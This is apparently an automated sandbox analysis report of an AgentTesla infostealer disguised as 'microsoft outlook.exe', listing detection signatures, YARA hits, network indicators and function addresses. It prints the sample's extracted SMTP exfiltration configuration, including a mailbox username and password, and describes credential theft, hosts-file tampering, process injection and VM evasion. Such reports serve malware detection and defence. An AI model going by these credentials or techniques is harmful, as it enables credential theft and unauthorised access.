Loading ...

Play interactive tourEdit tour

Windows Analysis Report microsoft outlook.exe

Overview

General Information

Sample Name:microsoft outlook.exe
Analysis ID:553252
MD5:483994a69d86ec2e58ff6468cf049f89
SHA1:36b1d5e58de9734faa40fe218e415c57e902292e
SHA256:a51cdfc1b836895069dc0e2d8b7e15e13c65714d44278add6ab306061cdbc0c8
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • microsoft outlook.exe (PID: 6888 cmdline: "C:\Users\user\Desktop\microsoft outlook.exe" MD5: 483994A69D86EC2E58FF6468CF049F89)
    • microsoft outlook.exe (PID: 1752 cmdline: "C:\Users\user\Desktop\microsoft outlook.exe" MD5: 483994A69D86EC2E58FF6468CF049F89)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "castilloo@cgyasc.com", "Password": "Castle1", "Host": "mail.cgyasc.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.0.microsoft outlook.exe.415058.12.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              3.0.microsoft outlook.exe.415058.12.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                3.0.microsoft outlook.exe.400000.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  3.0.microsoft outlook.exe.400000.7.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    3.2.microsoft outlook.exe.4950000.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 61 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 3.2.microsoft outlook.exe.3515530.3.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "castilloo@cgyasc.com", "Password": "Castle1", "Host": "mail.cgyasc.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: microsoft outlook.exeVirustotal: Detection: 55%Perma Link
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: microsoft outlook.exeAvira: detected
                      Antivirus detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dllAvira: detection malicious, Label: TR/Injector.wiefs
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dllMetadefender: Detection: 17%Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dllReversingLabs: Detection: 81%
                      Source: 3.0.microsoft outlook.exe.400000.11.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.microsoft outlook.exe.400000.9.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.microsoft outlook.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.microsoft outlook.exe.400000.7.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.2.microsoft outlook.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.microsoft outlook.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.1.microsoft outlook.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.microsoft outlook.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.microsoft outlook.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.2.microsoft outlook.exe.49a0000.5.unpackAvira: Label: TR/Spy.Gen8
                      Source: microsoft outlook.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: Binary string: wntdll.pdbUGP source: microsoft outlook.exe, 00000001.00000003.297741302.00000000029C0000.00000004.00000001.sdmp, microsoft outlook.exe, 00000001.00000003.291786394.0000000002B50000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: microsoft outlook.exe, 00000001.00000003.297741302.00000000029C0000.00000004.00000001.sdmp, microsoft outlook.exe, 00000001.00000003.291786394.0000000002B50000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00405C22 FindFirstFileA,FindClose,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00402630 FindFirstFileA,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00404A29 FindFirstFileExW,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49814 -> 192.185.25.212:587
                      Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                      Source: microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmpString found in binary or memory: http://YcxkAh.com
                      Source: microsoft outlook.exe, 00000003.00000002.560904754.0000000002863000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://cgyasc.com
                      Source: microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000003.505431063.00000000005E4000.00000004.00000001.sdmpString found in binary or memory: http://d8P2A6TrVo.net
                      Source: microsoft outlook.exe, 00000003.00000002.560904754.0000000002863000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmpString found in binary or memory: http://mail.cgyasc.com
                      Source: microsoft outlook.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                      Source: microsoft outlook.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: microsoft outlook.exe, microsoft outlook.exe, 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp, microsoft outlook.exe, 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: mail.cgyasc.com
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Modifies the hosts fileShow sources
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 3.2.microsoft outlook.exe.49a0000.5.unpack, u003cPrivateImplementationDetailsu003eu007b2E0BCB56u002d1BBBu002d423Cu002d8F51u002d94A15D000FB6u007d/C7FAB55Bu002d2018u002d4C8Au002dB9C4u002dBB5765976361.csLarge array initialization: .cctor: array initializer size 11982
                      Source: microsoft outlook.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00406043
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00404618
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_0040681A
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1324
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7524
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D8326
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D173E
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1D00
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7903
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2F5300
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D151E
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1B1A
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7B11
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7D10
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1565
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7567
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7762
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D3847
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D777F
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1D7B
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1773
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1D48
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1359
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D2354
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D3847
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1B50
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D73A8
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D6E9A
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D19A4
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1FA4
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2DC26F
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D17A0
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7BA0
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D85B5
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1DB4
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D219E
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D3847
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1B91
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7D92
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7BE3
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D17FD
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D69FD
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D15FF
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1BF2
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D15C9
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7FCB
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D19DE
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7DDE
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D17D1
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1BD2
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D5F3C
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D9684
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D763F
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1639
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1405
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7401
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D201D
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2FCA16
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D8411
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7C10
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1A65
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D2A72
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1CAE
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2DB220
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D78B5
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D5849
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1E8C
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D228F
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D8280
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D849A
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D7A95
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1891
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D8293
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D6E92
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D1EE0
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D84F9
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D5689
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D20F5
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D6F4C
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D18C5
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D14C0
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D16DF
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_0040A2A5
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_008351C0
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_0083B448
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_008368E0
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_0085E004
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00850068
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_0085AD98
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_0085C650
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00855718
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00856E38
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_022F47A0
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_022FF738
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_022F46B0
                      Source: microsoft outlook.exe, 00000001.00000003.291108170.0000000002AD6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs microsoft outlook.exe
                      Source: microsoft outlook.exe, 00000001.00000003.299390193.0000000002C6F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs microsoft outlook.exe
                      Source: microsoft outlook.exeBinary or memory string: OriginalFilename vs microsoft outlook.exe
                      Source: microsoft outlook.exe, 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameKPtHjBhBpIsMIgDrnnRFYHUEZfvUGBdFnZMeBP.exe4 vs microsoft outlook.exe
                      Source: microsoft outlook.exe, 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKPtHjBhBpIsMIgDrnnRFYHUEZfvUGBdFnZMeBP.exe4 vs microsoft outlook.exe
                      Source: microsoft outlook.exe, 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameKPtHjBhBpIsMIgDrnnRFYHUEZfvUGBdFnZMeBP.exe4 vs microsoft outlook.exe
                      Source: microsoft outlook.exe, 00000003.00000002.557857953.0000000000199000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs microsoft outlook.exe
                      Source: microsoft outlook.exe, 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameKPtHjBhBpIsMIgDrnnRFYHUEZfvUGBdFnZMeBP.exe4 vs microsoft outlook.exe
                      Source: microsoft outlook.exe, 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameKPtHjBhBpIsMIgDrnnRFYHUEZfvUGBdFnZMeBP.exe4 vs microsoft outlook.exe
                      Source: microsoft outlook.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: microsoft outlook.exeVirustotal: Detection: 55%
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile read: C:\Users\user\Desktop\microsoft outlook.exeJump to behavior
                      Source: microsoft outlook.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\microsoft outlook.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\microsoft outlook.exe "C:\Users\user\Desktop\microsoft outlook.exe"
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess created: C:\Users\user\Desktop\microsoft outlook.exe "C:\Users\user\Desktop\microsoft outlook.exe"
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess created: C:\Users\user\Desktop\microsoft outlook.exe "C:\Users\user\Desktop\microsoft outlook.exe"
                      Source: C:\Users\user\Desktop\microsoft outlook.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                      Source: C:\Users\user\Desktop\microsoft outlook.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\microsoft outlook.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile created: C:\Users\user\AppData\Local\Temp\nsr49FD.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@3/3@2/1
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
                      Source: C:\Users\user\Desktop\microsoft outlook.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,
                      Source: 3.2.microsoft outlook.exe.49a0000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 3.2.microsoft outlook.exe.49a0000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\microsoft outlook.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Binary string: wntdll.pdbUGP source: microsoft outlook.exe, 00000001.00000003.297741302.00000000029C0000.00000004.00000001.sdmp, microsoft outlook.exe, 00000001.00000003.291786394.0000000002B50000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: microsoft outlook.exe, 00000001.00000003.297741302.00000000029C0000.00000004.00000001.sdmp, microsoft outlook.exe, 00000001.00000003.291786394.0000000002B50000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_6F2D6AD3 pushfd ; retf 0000h
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 3_2_00401F16 push ecx; ret
                      Source: C:\Users\user\Desktop\microsoft outlook.exeCode function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                      Source: microsoft outlook.exeStatic PE information: real checksum: 0x0 should be: 0x9cc38
                      Source: wbyrs.dll.1.drStatic PE information: real checksum: 0x3550e should be: 0x3b412
                      Source: C:\Users\user\Desktop\microsoft outlook.exeFile created: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dllJump to dropped file
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\microsoft outlook.exeProcess information set: NOOPENFILEERRORBOX
